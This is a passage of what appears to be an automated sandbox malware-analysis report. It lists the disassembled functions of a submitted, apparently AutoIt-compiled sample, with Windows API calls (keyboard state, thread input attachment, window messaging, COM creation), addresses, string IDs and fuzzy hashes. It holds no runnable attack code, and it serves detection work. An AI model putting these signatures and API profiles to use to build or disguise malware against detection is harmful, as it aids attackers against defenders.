                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                          • String ID:
                          • API String ID: 3413494760-0
                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressProc_free_malloc$_strcat_strlen
                          • String ID: AU3_FreeVar
                          • API String ID: 2634073740-771828931
                          • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                          • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                          APIs
                          • CoInitialize.OLE32 ref: 0046C63A
                          • CoUninitialize.OLE32 ref: 0046C645
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                          • IIDFromString.OLE32(?,?), ref: 0046C705
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 2294789929-1287834457
                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                          APIs
                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                          • ReleaseCapture.USER32 ref: 0047116F
                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                          • API String ID: 2483343779-2107944366
                          • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                          • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                          • _wcslen.LIBCMT ref: 00450720
                          • _wcscat.LIBCMT ref: 00450733
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat_wcslen
                          • String ID: -----$SysListView32
                          • API String ID: 4008455318-3975388722
                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                          • GetParent.USER32 ref: 00469C98
                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                          • GetParent.USER32 ref: 00469CBC
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 2360848162-1403004172
                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                          • String ID:
                          • API String ID: 262282135-0
                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                          APIs
                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                          • String ID:
                          • API String ID: 3771399671-0
                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 0-1603158881
                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                          • DestroyWindow.USER32(?), ref: 00426F50
                          • UnregisterHotKey.USER32(?), ref: 00426F77
                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                          • String ID: close all$#v
                          • API String ID: 4174999648-3101823635
                          • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                          • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                          APIs
                          • CreateMenu.USER32 ref: 00448603
                          • SetMenu.USER32(?,00000000), ref: 00448613
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                          • IsMenu.USER32(?), ref: 004486AB
                          • CreatePopupMenu.USER32 ref: 004486B5
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                          • DrawMenuBar.USER32 ref: 004486F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                          • String ID: 0
                          • API String ID: 161812096-4108050209
                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                          • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                          APIs
                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
